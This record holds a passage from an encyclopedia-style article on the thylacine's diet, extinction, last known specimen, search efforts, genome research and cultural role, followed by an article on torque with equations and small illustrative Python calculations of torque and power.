accounts reporting the predation of rabbits by thylacines. Some accounts also suggest that the thylacine may have preyed on lizards, frogs and fish.
European settlers believed the thylacine to prey regularly upon farmers' sheep and poultry. However, analysis by Robert Paddle suggests that there is little evidence that thylacines were significant predators of sheep or poultry (though some accounts suggest that they may have attacked them on occasion), with many sheep deaths likely caused by feral dog attacks instead. Throughout the 20th century, the thylacine was often characterised as primarily a blood drinker; according to Robert Paddle, the story's popularity seems to have originated from a single second-hand account heard by Geoffrey Smith (1881–1916) in a shepherd's hut. Recent studies suggest that the thylacine was probably not suited for hunting large prey. A 2007 study argued that, while it could open its jaws wide like modern mammalian predators that consume large prey, the canine of the thylacine was not suited for slashing bites like those of large canids; on the assumption that bite force was largely determined by the skull, this indicates that it hunted small to medium-sized prey as a solitary hunter. A 2011 study by the University of New South Wales using advanced computer modelling indicated that the thylacine had surprisingly feeble jaws; animals usually take prey close to their own body size, but an adult thylacine of around was found to be incapable of handling prey much larger than , suggesting that the thylacine only ate smaller animals such as bandicoots, pademelons and possums, and that it may have directly competed with the Tasmanian devil and the tiger quoll. Another study in 2020 produced similar results: after estimating the average body mass of the thylacine as about rather than , it suggested that the animal did indeed hunt much smaller prey. The cranial and facial morphology also indicates that the thylacine would have hunted prey less than 45% of its own body mass, consistent with modern carnivores weighing under , which is about the average size of a thylacine. A 2005 study showed that the thylacine had a high bite force quotient of 166, which was similar to that of most quolls, indicating that it may have been able to hunt larger prey relative to its body size. A 2007 study also suggested that it would have had a much stronger bite force than a dingo of similar size, though this particular study argued that the thylacine would have hunted smaller prey. A biomechanical analysis of a 3D skull model suggested that the thylacine would likely have consumed smaller prey, with its skull displaying high levels of stress not suited to withstand large forces, and with its bite force estimated at a smaller value than that of Tasmanian devils. A 2014 study compared the skull of a thylacine with those of modern dasyurids and an earlier thylacinid taxon, Nimbacinus, based on biomechanical analysis of their 3D skull models; the authors suggested that while Nimbacinus was suited to hunting large prey, with a maximum muscle force of , similar to that of large Tasmanian devils, the thylacine skull displayed much higher stress in all areas compared to its relatives due to its longer snout. If the thylacine were indeed specialised for small prey, this specialisation likely made it susceptible to small disturbances to the ecosystem.
It has been suggested, on the basis of the canine teeth and limb bones, that the thylacine was a solitary pounce-pursuit predator that hunted smaller prey, with a trophic niche similar to relatively smaller canids like the coyote, and that it was not as specialised as the large canids, hyaenids and felids of today: its canines lacked the adaptations for producing slashing or deep penetrating bites, and its anatomy was not suited for running at high speed. However, trappers reported it as an ambush predator hunting alone or in pairs, mainly at night. The elbow joint morphology and the forelimb anatomy of the thylacine also suggest that the animal was most likely an ambush predator. The stomach of a thylacine was very muscular, capable of distending to allow the animal to eat large amounts of food at one time, probably an adaptation to compensate for long periods when hunting was unsuccessful and food scarce. In captivity, thylacines were fed a wide variety of foods, including dead rabbits and wallabies as well as beef, mutton, horse and, occasionally, poultry. There is a report of a captive thylacine that refused to eat dead wallaby flesh or to kill and eat a live wallaby offered to it, but "ultimately it was persuaded to eat by having the smell of blood from a freshly killed wallaby put before its nose."
Extinction
Dying out on the Australian mainland
Australia lost more than 90% of its megafauna around 50–40,000 years ago as part of the Quaternary extinction event, with the notable exceptions of several kangaroo and wombat species, emus, cassowaries, large goannas, and the thylacine. The extinctions included the even larger carnivore Thylacoleo carnifex (sometimes called the marsupial lion), which was only distantly related to the thylacine. A 2010 paper examining this issue showed that humans were likely to be one of the major factors in the extinction of many species in Australia, although the authors of the research warned that one-factor explanations might be over-simplistic. The youngest radiocarbon dates of the thylacine in mainland Australia are around 3,500 years old, with an estimated extinction date around 3,200 years ago, synchronous with that of the Tasmanian devil on the mainland, and closely coinciding with the earliest records of the dingo as well as an intensification of human activity. A study proposes that the dingo may have led to the extinction of the thylacine in mainland Australia because the dingo outcompeted the thylacine in preying on the Tasmanian nativehen. The dingo is also more likely to hunt in packs than the more solitary thylacine. Examinations of dingo and thylacine skulls show that although the dingo had a weaker bite, its skull could resist greater stresses, allowing it to pull down larger prey than the thylacine. Because it was a hypercarnivore, the thylacine was less versatile in its diet than the omnivorous dingo. Their ranges appear to have overlapped, because thylacine subfossil remains have been discovered near those of dingoes. Aside from wild dingoes, the adoption of the dingo as a hunting companion by the indigenous peoples would have put the thylacine under increased pressure. A 2013 study suggested that, while dingoes were a contributing factor in the thylacine's demise on the mainland, larger factors were intense human population growth, technological advances, and an abrupt change in the climate during the period. A report published in the Journal of Biogeography detailed an investigation into the mitochondrial DNA and radiocarbon dating of thylacine bones.
It concluded that the thylacine died out on mainland Australia in a relatively short time span. Ken Mulvaney has suggested, based on the high number of rock carvings of the thylacine on the Burrup Peninsula, that Aboriginal Australians were aware of, and concerned about, the thylacine's dwindling numbers around that time.
Dying out on Tasmania
Although the thylacine had died out on mainland Australia, it survived into the 1930s on the island of Tasmania. At the time of the first European settlement, the heaviest distributions were in the northeast, northwest and north-midland regions of the state. There were an estimated 5,000 at the time. They were rarely sighted but slowly began to be credited with numerous attacks on sheep. This led to the establishment of bounty schemes in an attempt to control their numbers. The Van Diemen's Land Company introduced bounties on the thylacine from as early as 1830, and between 1888 and 1909, the Tasmanian government paid £1 per head for dead adult thylacines and ten shillings for pups. In all, it paid out 2,184 bounties, but it is thought that many more thylacines were killed than were claimed for. The thylacine's extinction is popularly attributed to these relentless efforts by farmers and bounty hunters. Aside from persecution, it is likely that multiple factors rapidly compounded its decline and eventual extinction, including competition with wild dogs introduced by European settlers, erosion of its habitat, already-low genetic diversity, the concurrent extinction or decline of prey species, and a distemper-like disease that affected many captive specimens at the time. A study from 2012 suggested that the disease was likely introduced by humans and that it was also present in the wild population. The marsupi-carnivore disease, as it became known, dramatically reduced the lifespan of the animal and greatly increased pup mortality. A 1921 photo by Henry Burrell of a thylacine with a chicken was widely distributed and may have helped secure the animal's reputation as a poultry thief. The image had been cropped to hide the fact that the animal was in captivity, and analysis by one researcher has concluded that this thylacine was a dead specimen, posed for the camera. The photograph may even have involved photo manipulation. The animal had become extremely rare in the wild by the late 1920s. Despite the fact that the thylacine was believed by many to be responsible for attacks on sheep, in 1928 the Tasmanian Advisory Committee for Native Fauna recommended a reserve similar to the Savage River National Park to protect any remaining thylacines, with potential sites of suitable habitat including the Arthur–Pieman area of western Tasmania. By the beginning of the 20th century, the increasing rarity of thylacines led to increased demand for captive specimens by zoos around the world, placing yet more pressure on an already small population. Despite the export of breeding pairs, attempts at rearing thylacines in captivity were unsuccessful, and the last thylacine outside Australia died at London Zoo in 1931. The last known thylacine to be killed in the wild was shot in 1930 by Wilf Batty, a farmer from Mawbanna in the state's northwest. The animal, believed to have been a male, had been seen around Batty's house for several weeks. Work in 2012 examined the genetic diversity of the thylacine before its extinction.
The results indicated that the last of the thylacines in Tasmania had limited genetic diversity, due to their complete geographic isolation from mainland Australia. Further investigations in 2017 showed evidence that this decline in genetic diversity started long before the arrival of humans in Australia, possibly as early as 70–120 thousand years ago. The thylacine held the status of endangered species until the 1980s. International standards at the time stated that an animal could not be declared extinct until 50 years had passed without a confirmed record. Since no definitive proof of the thylacine's existence in the wild had been obtained for more than 50 years, it met that official criterion and was declared extinct by the International Union for Conservation of Nature in 1982 and by the Tasmanian government in 1986. The species was removed from Appendix I of the Convention on International Trade in Endangered Species of Wild Fauna and Flora (CITES) in 2013.
Last of the species
The last captive thylacine lived as an endling (the known last of its species) at Hobart Zoo until its death on the night of 7 September 1936. The animal, a female, was captured by Elias Churchill with a snare trap and was sold to the zoo in May 1936. The sale was not publicly announced because the use of traps was illegal and Churchill could have been fined. After its death, the remains of the endling were transferred to the Tasmanian Museum and Art Gallery. The remains were not properly recorded by the museum because the animal had been caught illegally, and they lay undiscovered for decades until a taxidermist's record, dated 1936 or 1937 and mentioning the animal, was noticed. This led to a full audit of all thylacine remains at the museum and the endling's successful identification at the end of 2022. In 1968, Frank Darby invented the myth that the endling was called Benjamin. The myth was widely circulated in the media, with Wikipedia itself repeating the invention. The thylacine that Darby was referring to was a female at Hobart Zoo. This animal is believed to have died as the result of neglect: locked out of its sheltered sleeping quarters, it was exposed to a rare occurrence of extreme Tasmanian weather, with extreme heat during the day and freezing temperatures at night. This thylacine features in the last known motion picture footage of a living specimen: 45 seconds of black-and-white footage showing the thylacine in its enclosure, in a clip taken in 1933 by naturalist David Fleay. In the film footage, the thylacine is seen seated, walking around the perimeter of its enclosure, yawning, sniffing the air, scratching itself (in the same manner as a dog), and lying down. Fleay was bitten on the buttock whilst shooting the film. In 2021, a digitally colourised 80-second clip of Fleay's footage of the thylacine was released by the National Film and Sound Archive of Australia to mark National Threatened Species Day. The digital colourisation process was based on historic primary and secondary descriptions to ensure an accurate colour match. Although there had been a conservation movement pressing for the thylacine's protection since 1901, driven in part by the increasing difficulty in obtaining specimens for overseas collections, political difficulties prevented any form of protection coming into force until 1936. Official protection of the species by the Tasmanian government came all too late; it was introduced on 10 July 1936, 59 days before the last known specimen died in captivity.
Searches and unconfirmed sightings
Between 1967 and 1973, zoologist Jeremy Griffith and dairy farmer James Malley conducted what is regarded as the most intensive search for thylacines ever carried out, including exhaustive surveys along Tasmania's west coast, installation of automatic camera stations, prompt investigations of claimed sightings, and, in 1972, the creation of the Thylacine Expeditionary Research Team with Dr. Bob Brown, which concluded without finding any evidence of the thylacine's existence. The Department of Conservation and Land Management recorded 203 reports of sightings of the thylacine in Western Australia from 1936 to 1998. On the mainland, sightings are most frequently reported in southern Victoria. According to the Department of Primary Industries, Parks, Water and Environment, there were eight unconfirmed thylacine sighting reports between 2016 and 2019, with the latest unconfirmed visual sighting on 25 February 2018. Since the disappearance and effective extinction of the thylacine, speculation about and searches for a living specimen have become a topic of interest to some members of the cryptozoology subculture. The search for the animal has been the subject of books and articles, with many reported sightings that are largely regarded as dubious. A 2023 study published by Brook et al. compiles many of the alleged sightings of thylacines in Tasmania throughout the 20th century and claims that, contrary to the belief that the thylacine went extinct in the 1930s, the Tasmanian thylacine may actually have persisted through much of the 20th century, with a window of extinction between the 1980s and the present day and a likely extinction date between the late 1990s and early 2000s. In 1983, the American media mogul Ted Turner offered a $100,000 reward for proof of the continued existence of the thylacine. In March 2005, the Australian news magazine The Bulletin, as part of its 125th anniversary celebrations, offered a $1.25 million reward for the safe capture of a live thylacine. When the offer closed at the end of June 2005, no one had produced any evidence of the animal's existence. A reward of $1.75 million was subsequently offered by a Tasmanian tour operator, Stewart Malcolm.
Research
Research into thylacines relies heavily on specimens held in museums and other institutions across the world. The number and distribution of these specimens have been recorded in the International Thylacine Specimen Database. As of 2022, 756 specimens are held in 115 museums and university collections in 23 countries. In 2017, a reference library of 159 micrographic images of thylacine hair was jointly produced by CSIRO and Where Light Meets Dark.
Possible revival
The Australian Museum in Sydney began a cloning project in 1999. The goal was to use genetic material from specimens taken and preserved in the early 20th century to clone new individuals and restore the species from extinction. Several molecular biologists dismissed the project as a public relations stunt. In late 2002, the researchers had some success, as they were able to extract replicable DNA from the specimens. On 15 February 2005, the museum announced that it was stopping the project. In May 2005, the project was restarted by a group of interested universities and a research institute.
In August 2022, it was announced that the University of Melbourne would partner with the Texas-based biotechnology company Colossal Biosciences to attempt to re-create the thylacine using its closest living relative, the fat-tailed dunnart, and return it to Tasmania. The university had recently sequenced the genome of a juvenile thylacine specimen and was establishing a thylacine genetic restoration laboratory. The research from the University of Melbourne was led by Andrew Pask. The project was regarded with scepticism by other, uninvolved scientists.
DNA sequencing
A draft whole-genome sequence of the thylacine was produced by Feigin et al. (2017) using DNA extracted from an ethanol-preserved pouch young specimen provided by Museums Victoria. The neonatal development of the thylacine was also reconstructed from preserved pouch young specimens from several museum collections. Researchers used the genome to study aspects of the thylacine's evolution and natural history, including the genetic basis of its convergence with canids, clarifying its evolutionary relationships with other marsupials and examining changes in its population size over time. The genomic basis of the convergent evolution between the thylacine and the grey wolf was further investigated in 2019, with researchers identifying many non-coding genomic regions displaying accelerated rates of evolution, a test for genetic regions evolving under positive selection. In 2021, researchers further identified a link between the convergent skull shapes of the thylacine and wolf and the previously identified genetic candidates. It was reported that specific groups of skull bones, which develop from a common population of stem cells called neural crest cells, showed strong similarity between the thylacine and wolf and corresponded with the underlying convergent genetic candidates which influence these cells during development. In 2023, RNA was extracted from a 130-year-old thylacine specimen in Sweden; this represented the first time RNA had been extracted from an extinct species. In October 2024, a 99.9% complete thylacine genome was sequenced from a well-preserved skull estimated to be 110 years old, allowing the full genome of the species to be sequenced three months later.
Cultural significance
Official usage
The thylacine has been used extensively as a symbol of Tasmania. The animal is featured on the official Tasmanian coat of arms. It is used in the official logos of the Tasmanian government and the City of Launceston. It is also used on the University of Tasmania's ceremonial mace and the badge of the submarine HMAS Dechaineux. Since 1998, it has been prominently displayed on Tasmanian vehicle number plates. The thylacine has appeared on postage stamps from Australia, Equatorial Guinea, and Micronesia. Since 1996, 7 September (the date in 1936 on which the last known thylacine died) has been commemorated in Australia as National Threatened Species Day.
In popular culture
The thylacine has become a cultural icon in Australia. The best-known illustrations of Thylacinus cynocephalus were those in John Gould's The Mammals of Australia (1845–1863), often copied since its publication and the most frequently reproduced, given further exposure by Cascade Brewery's appropriation of the image for its label in 1987. The government of Tasmania published a monochromatic reproduction of the same image in 1934, and the author Louisa Anne Meredith also copied it for Tasmanian Friends and Foes (1881). The thylacine is the mascot of the Tasmanian cricket team.
A series of postage stamps featuring Mickey Mouse characters with Australian animals includes a thylacine stamp. In video games, the boomerang-wielding Ty the Tasmanian Tiger starred in his own trilogy during the 2000s. Tiny Tiger, a villain in the popular Crash Bandicoot video game series, is a mutated thylacine. In Valorant, the agent Skye has the ability to use a Tasmanian tiger to scout enemies and clear bomb-planting sites. The animal has also made appearances in film and television. Characters in the early 1990s cartoon Taz-Mania included the neurotic Wendell T. Wolf, the last surviving Tasmanian wolf. The Hunter is a 2011 Australian drama film, based on the 1999 novel of the same name by Julia Leigh; it stars Willem Dafoe, who plays a man hired to track down the Tasmanian tiger. In the 2021 film Extinct, a thylacine named Burnie, along with a group of other extinct animals, helps the movie's main characters travel through time to rescue their species from extinction. In the 2022 science-fiction show The Peripheral, the Tasmanian tiger is brought back into existence from DNA extracts. An animated web series titled "De-extincting Tasie", meant to explain the revival of the species by Colossal Biosciences and the University of Melbourne, features a thylacine named Tasie, a satire of the Mr. DNA character from the Jurassic Park media franchise.
In Aboriginal tradition
Rock art featuring thylacine-like animals is found throughout northern Australia, particularly in the Kimberley region. Various Aboriginal Tasmanian names for the thylacine have been recorded, such as coorinna, kanunnah, cab-berr-one-nen-er, loarinna, laoonana, can-nen-ner and lagunta, while kaparunina is used in Palawa kani. One Nuenonne myth recorded by Jackson Cotton tells of a thylacine pup saving Palana, a spirit boy, from an attack by a giant kangaroo. Palana marked the pup's back with ochre as a mark of its bravery, giving thylacines their stripes. A constellation, "Wurrawana Corinna" (identified as within or near Gemini), was also created as a commemoration of this mythic act of bravery. An early European record tells how Aboriginal people believed bad weather was caused by a thylacine carcass being left exposed on the ground instead of being covered by a small shelter.
Biology and health sciences
Marsupials
Animals
30400
https://en.wikipedia.org/wiki/Torque
Torque
In physics and mechanics, torque is the rotational analogue of linear force. It is also referred to as the moment of force (also abbreviated to moment). The symbol for torque is typically τ, the lowercase Greek letter tau. When it is referred to as the moment of force, it is commonly denoted by M. Just as a linear force is a push or a pull applied to a body, a torque can be thought of as a twist applied to an object with respect to a chosen point; for example, driving a screw uses torque, which is applied by the screwdriver rotating around its axis to the drive in the screw's head.
History
The term torque (from Latin torquere, 'to twist') is said to have been suggested by James Thomson and appeared in print in April 1884. Usage is attested the same year by Silvanus P. Thompson in the first edition of Dynamo-Electric Machinery, where Thompson motivated the choice of term. Today, torque is referred to using different vocabulary depending on geographical location and field of study. This article follows the definition used in US physics in its usage of the word torque. In the UK and in US mechanical engineering, torque is referred to as moment of force, usually shortened to moment. This terminology can be traced back to at least 1811 in the work of Siméon Denis Poisson, an English translation of which appeared in 1842.
Definition and relation to other physical quantities
A force applied perpendicularly to a lever multiplied by its distance from the lever's fulcrum (the length of the lever arm) is its torque. Therefore, torque is defined as the product of the magnitude of the perpendicular component of the force and the distance of the line of action of the force from the point around which it is being determined. In three dimensions, the torque is a pseudovector; for point particles, it is given by the cross product of the displacement vector and the force vector. The direction of the torque can be determined by using the right-hand grip rule: if the fingers of the right hand are curled from the direction of the lever arm to the direction of the force, then the thumb points in the direction of the torque. It follows that the torque vector is perpendicular to both the position and force vectors and defines the plane in which the two vectors lie. The resulting torque vector direction is determined by the right-hand rule. Therefore any force directed parallel to the particle's position vector does not produce a torque. The magnitude of torque applied to a rigid body depends on three quantities: the force applied, the lever arm vector connecting the point about which the torque is being measured to the point of force application, and the angle between the force and lever arm vectors. In symbols:
$$\boldsymbol{\tau} = \mathbf{r} \times \mathbf{F}, \qquad \tau = r F \sin\theta = r F_{\perp},$$
where $\boldsymbol{\tau}$ is the torque vector and $\tau$ is the magnitude of the torque; $\mathbf{r}$ is the position vector (a vector from the point about which the torque is being measured to the point where the force is applied) and $r$ is the magnitude of the position vector; $\mathbf{F}$ is the force vector, $F$ is the magnitude of the force vector and $F_{\perp}$ is the amount of force directed perpendicularly to the position of the particle; $\times$ denotes the cross product, which produces a vector that is perpendicular both to $\mathbf{r}$ and to $\mathbf{F}$ following the right-hand rule; and $\theta$ is the angle between the force vector and the lever arm vector. The SI unit for torque is the newton-metre (N⋅m). For more on the units of torque, see the Units section below.
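As an illustrative sketch (not from the article itself), the vector definition above can be checked numerically; the array values here are arbitrary examples, assuming NumPy is available:

```python
import numpy as np

# Position of the point of force application relative to the pivot (metres),
# and the applied force (newtons) -- arbitrary example values.
r = np.array([0.5, 0.0, 0.0])   # lever arm along x
F = np.array([0.0, 10.0, 0.0])  # force along y, perpendicular to the lever

tau = np.cross(r, F)            # torque pseudovector, tau = r x F
print(tau)                      # [0. 0. 5.] -> 5 N*m about the z-axis

# Magnitude via tau = r F sin(theta): here theta = 90 degrees, so 0.5 * 10 = 5
print(np.linalg.norm(tau))      # 5.0
```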
Relationship with angular momentum
The net torque on a body determines the rate of change of the body's angular momentum:
$$\boldsymbol{\tau} = \frac{d\mathbf{L}}{dt},$$
where L is the angular momentum vector and t is time. For the motion of a point particle,
$$\mathbf{L} = I\boldsymbol{\omega},$$
where I is the moment of inertia and ω is the orbital angular velocity pseudovector. It follows, using the derivative of a vector, that
$$\boldsymbol{\tau}_{\text{net}} = \frac{d\mathbf{L}}{dt} = \frac{d(I\boldsymbol{\omega})}{dt}.$$
This equation is the rotational analogue of Newton's second law for point particles, and is valid for any type of trajectory. In some simple cases, like a rotating disc where the moment of inertia about the rotation axis is constant, the rotational Newton's second law can be written
$$\tau = I\alpha,$$
where $\alpha = \dot{\omega}$ is the angular acceleration.
Proof of the equivalence of definitions
The definition of angular momentum for a single point particle is
$$\mathbf{L} = \mathbf{r} \times \mathbf{p},$$
where p is the particle's linear momentum and r is the position vector from the origin. The time-derivative of this is
$$\frac{d\mathbf{L}}{dt} = \mathbf{r} \times \frac{d\mathbf{p}}{dt} + \frac{d\mathbf{r}}{dt} \times \mathbf{p}.$$
This result can easily be proven by splitting the vectors into components and applying the product rule. But because the rate of change of linear momentum is force ($\mathbf{F} = d\mathbf{p}/dt$) and the rate of change of position is velocity ($\mathbf{v} = d\mathbf{r}/dt$),
$$\frac{d\mathbf{L}}{dt} = \mathbf{r} \times \mathbf{F} + \mathbf{v} \times \mathbf{p}.$$
The cross product of momentum with its associated velocity is zero because velocity and momentum are parallel, so the second term vanishes. Therefore, torque on a particle is equal to the first derivative of its angular momentum with respect to time. If multiple forces are applied, according to Newton's second law it follows that
$$\frac{d\mathbf{L}}{dt} = \mathbf{r} \times \mathbf{F}_{\text{net}} = \boldsymbol{\tau}_{\text{net}}.$$
This is a general proof for point particles, but it can be generalized to a system of point particles by applying the above proof to each of the point particles and then summing over all the point particles. Similarly, the proof can be generalized to a continuous mass by applying the above proof to each point within the mass, and then integrating over the entire mass.
Derivatives of torque
In physics, rotatum is the derivative of torque with respect to time:
$$\mathbf{P} = \frac{d\boldsymbol{\tau}}{dt},$$
where τ is torque. The word is derived from the Latin rotātum, meaning 'to rotate'; the term rotatum is not universally recognized but is commonly used. There is not a universally accepted lexicon to indicate the successive derivatives of rotatum, even if sometimes various proposals have been made. Using the cross product definition of torque, an alternative expression for rotatum is:
$$\mathbf{P} = \mathbf{r} \times \frac{d\mathbf{F}}{dt} + \frac{d\mathbf{r}}{dt} \times \mathbf{F}.$$
Because the rate of change of force is yank ($\mathbf{Y} = d\mathbf{F}/dt$) and the rate of change of position is velocity ($\mathbf{v}$), the expression can be further simplified to:
$$\mathbf{P} = \mathbf{r} \times \mathbf{Y} + \mathbf{v} \times \mathbf{F}.$$
Relationship with power and energy
The law of conservation of energy can also be used to understand torque. If a force is allowed to act through a distance, it is doing mechanical work. Similarly, if torque is allowed to act through an angular displacement, it is doing work. Mathematically, for rotation about a fixed axis through the center of mass, the work W can be expressed as
$$W = \int_{\theta_1}^{\theta_2} \tau \, d\theta,$$
where τ is torque, and θ1 and θ2 represent (respectively) the initial and final angular positions of the body. It follows from the work–energy principle that W also represents the change in the rotational kinetic energy Er of the body, given by
$$E_r = \tfrac{1}{2} I \omega^2,$$
where I is the moment of inertia of the body and ω is its angular speed. Power is the work per unit time, given by
$$P = \boldsymbol{\tau} \cdot \boldsymbol{\omega},$$
where P is power, τ is torque, ω is the angular velocity, and ⋅ represents the scalar product. Algebraically, the equation may be rearranged to compute torque for a given angular speed and power output.
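A minimal numerical sketch of the rotational second law above; the mass, radius, torque, and time step are arbitrary assumptions, not values from the article:

```python
# Spin up a uniform disc with a constant torque, using tau = I * alpha.
mass = 2.0                   # kg (assumed)
radius = 0.1                 # m (assumed)
I = 0.5 * mass * radius**2   # moment of inertia of a uniform disc, kg*m^2

tau = 0.05                   # applied torque, N*m (assumed)
alpha = tau / I              # angular acceleration, rad/s^2

omega, t, dt = 0.0, 0.0, 0.01
while t < 2.0:               # integrate d(omega)/dt = alpha for 2 seconds
    omega += alpha * dt
    t += dt

print(omega)                 # ~= alpha * 2.0 = 10.0 rad/s for these values
```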
The power injected by the torque depends only on the instantaneous angular speed – not on whether the angular speed increases, decreases, or remains constant while the torque is being applied (this is equivalent to the linear case, where the power injected by a force depends only on the instantaneous speed – not on the resulting acceleration, if any).
Proof
The work done by a variable force acting over a finite linear displacement is given by integrating the force with respect to an elemental linear displacement:
$$W = \int \mathbf{F} \cdot d\mathbf{s}.$$
However, the infinitesimal linear displacement is related to a corresponding angular displacement and the radius vector as
$$d\mathbf{s} = d\boldsymbol{\theta} \times \mathbf{r}.$$
Substitution in the above expression for work gives
$$W = \int \mathbf{F} \cdot (d\boldsymbol{\theta} \times \mathbf{r}).$$
The expression inside the integral is a scalar triple product, $\mathbf{F} \cdot (d\boldsymbol{\theta} \times \mathbf{r}) = (\mathbf{r} \times \mathbf{F}) \cdot d\boldsymbol{\theta}$, but as per the definition of torque $\boldsymbol{\tau} = \mathbf{r} \times \mathbf{F}$, and since the parameter of integration has been changed from linear displacement to angular displacement, the equation becomes
$$W = \int \boldsymbol{\tau} \cdot d\boldsymbol{\theta}.$$
If the torque and the angular displacement are in the same direction, then the scalar product reduces to a product of magnitudes, i.e. $\boldsymbol{\tau} \cdot d\boldsymbol{\theta} = \tau \, d\theta$, giving
$$W = \int \tau \, d\theta.$$
Principle of moments
The principle of moments, also known as Varignon's theorem (not to be confused with the geometrical theorem of the same name), states that the resultant torque due to several forces applied about a point is equal to the sum of the contributing torques:
$$\boldsymbol{\tau} = \boldsymbol{\tau}_1 + \boldsymbol{\tau}_2 + \cdots + \boldsymbol{\tau}_N.$$
From this it follows that the torques resulting from N forces acting around a pivot on an object are balanced when
$$\boldsymbol{\tau}_1 + \boldsymbol{\tau}_2 + \cdots + \boldsymbol{\tau}_N = \mathbf{0}.$$
Units
Torque has the dimension of force times distance, symbolically $\mathsf{L}^2 \mathsf{M} \mathsf{T}^{-2}$, and those fundamental dimensions are the same as that for energy or work. Official SI literature indicates the newton-metre, properly denoted N⋅m, as the unit for torque; although this is dimensionally equivalent to the joule, the joule is not used for torque. In the case of torque, the unit is assigned to a vector, whereas for energy, it is assigned to a scalar. This means that the dimensional equivalence of the newton-metre and the joule may be applied in the former but not in the latter case. This problem is addressed in orientational analysis, which treats the radian as a base unit rather than as a dimensionless unit. The traditional imperial units for torque are the pound foot (lbf-ft), or, for small values, the pound inch (lbf-in). In the US, torque is most commonly referred to as the foot-pound (denoted as either lb-ft or ft-lb) and the inch-pound (denoted as in-lb). Practitioners depend on context and the hyphen in the abbreviation to know that these refer to torque and not to energy or moment of mass (as the symbolism ft-lb would properly imply).
Conversion to other units
A conversion factor may be necessary when using different units of power or torque. For example, if rotational speed (unit: revolutions per minute or per second) is used in place of angular speed (unit: radians per second), we must multiply by 2π radians per revolution. In the following formulas, P is power, τ is torque, and ν (Greek letter nu) is rotational speed. Showing units:
$$P = \tau \cdot 2\pi \cdot \nu,$$
which gives power in watts when torque is in newton-metres and rotational speed is in revolutions per second. Dividing by 60 seconds per minute gives the following:
$$P = \frac{\tau \cdot 2\pi \cdot \nu}{60},$$
where rotational speed is in revolutions per minute (rpm, rev/min). Some people (e.g., American automotive engineers) use horsepower (mechanical) for power, foot-pounds (lbf⋅ft) for torque and rpm for rotational speed. This results in the formula changing to:
$$P_{\text{hp}} = \frac{\tau \cdot 2\pi \cdot \nu}{33{,}000}.$$
The constant 33,000 (in foot-pounds per minute per horsepower) changes with the definition of the horsepower; for example, using metric horsepower, it becomes approximately 32,550.
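A small sketch of the conversions above; the function names and example numbers are my own illustrations:

```python
import math

def power_watts(torque_nm: float, rpm: float) -> float:
    """Power in watts from torque (N*m) and rotational speed (rpm)."""
    return torque_nm * 2 * math.pi * rpm / 60

def power_hp(torque_lbf_ft: float, rpm: float) -> float:
    """Mechanical horsepower from torque (lbf*ft) and speed (rpm),
    using 1 hp = 33,000 ft*lbf/min."""
    return torque_lbf_ft * 2 * math.pi * rpm / 33_000

print(power_watts(250, 3000))  # ~78,540 W for 250 N*m at 3000 rpm
print(power_hp(300, 5252))     # ~300 hp: near 5252 rpm, hp ~= lbf*ft torque
```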
The use of other units (e.g., BTU per hour for power) would require a different custom conversion factor.
Derivation
For a rotating object, the linear distance covered at the circumference of rotation is the product of the radius with the angle covered. That is: linear distance = radius × angular distance. And by definition, linear distance = linear speed × time = radius × angular speed × time. By the definition of torque: torque = radius × force. We can rearrange this to determine force = torque ÷ radius. These two values can be substituted into the definition of power:
$$P = F v = \frac{\tau}{r}\,(r\omega) = \tau\omega.$$
The radius r and time t have dropped out of the equation. However, angular speed must be in radians per unit of time, by the assumed direct relationship between linear speed and angular speed at the beginning of the derivation. If the rotational speed is measured in revolutions per unit of time, the linear speed and distance are increased proportionately by 2π in the above derivation to give:
$$P = \tau \cdot 2\pi \cdot \nu.$$
If torque is in newton-metres and rotational speed in revolutions per second, the above equation gives power in newton-metres per second or watts. If Imperial units are used, and if torque is in pounds-force feet and rotational speed in revolutions per minute, the above equation gives power in foot pounds-force per minute. The horsepower form of the equation is then derived by applying the conversion factor 33,000 ft⋅lbf/min per horsepower:
$$P_{\text{hp}} = \frac{\tau \cdot 2\pi \cdot \nu}{33{,}000},$$
because $1\ \text{hp} = 33{,}000\ \text{ft}\cdot\text{lbf/min}$.
Special cases and other facts
Moment arm formula
A very useful special case, often given as the definition of torque in fields other than physics, is as follows:
$$\tau = (\text{moment arm}) \times (\text{force}).$$
The construction of the "moment arm" is shown in the figure to the right, along with the vectors r and F mentioned above. The problem with this definition is that it does not give the direction of the torque but only the magnitude, and hence it is difficult to use in three-dimensional cases. If the force is perpendicular to the displacement vector r, the moment arm will be equal to the distance to the centre, and torque will be a maximum for the given force. The equation for the magnitude of a torque arising from a perpendicular force is
$$\tau = (\text{distance to centre}) \times (\text{force}).$$
For example, if a person places a force of 10 N at the terminal end of a wrench that is 0.5 m long (or a force of 10 N acting 0.5 m from the twist point of a wrench of any length), the torque will be 5 N⋅m, assuming that the person moves the wrench by applying force in the plane of movement and perpendicular to the wrench.
Static equilibrium
For an object to be in static equilibrium, not only must the sum of the forces be zero, but also the sum of the torques (moments) about any point. For a two-dimensional situation with horizontal and vertical forces, the sum of the forces requirement is two equations, $\Sigma F_x = 0$ and $\Sigma F_y = 0$, and the torque requirement is a third equation, $\Sigma \tau = 0$. That is, to solve statically determinate equilibrium problems in two dimensions, three equations are used.
Net force versus torque
When the net force on the system is zero, the torque measured from any point in space is the same. For example, the torque on a current-carrying loop in a uniform magnetic field is the same regardless of the point of reference. If the net force $\mathbf{F}$ is not zero, and $\boldsymbol{\tau}_1$ is the torque measured from point 1, then the torque measured from point 2 is
$$\boldsymbol{\tau}_2 = \boldsymbol{\tau}_1 + \mathbf{r}_{21} \times \mathbf{F},$$
where $\mathbf{r}_{21}$ is the vector from point 2 to point 1.
Machine torque
Torque forms part of the basic specification of an engine: the power output of an engine is expressed as its torque multiplied by the angular speed of the drive shaft.
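The reference-point shift formula above can be checked numerically; this is an illustrative sketch with arbitrary vectors, assuming NumPy:

```python
import numpy as np

# Verify tau_2 = tau_1 + r_21 x F for a single force; all values are
# arbitrary examples.
r_force = np.array([1.0, 2.0, 0.0])   # where the force acts
F = np.array([0.0, 3.0, 0.0])         # the (net) force

p1 = np.array([0.0, 0.0, 0.0])        # reference point 1
p2 = np.array([2.0, 1.0, 0.0])        # reference point 2

tau1 = np.cross(r_force - p1, F)      # torque about point 1
tau2 = np.cross(r_force - p2, F)      # torque about point 2

r21 = p1 - p2                         # vector from point 2 to point 1
print(np.allclose(tau2, tau1 + np.cross(r21, F)))  # True
```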
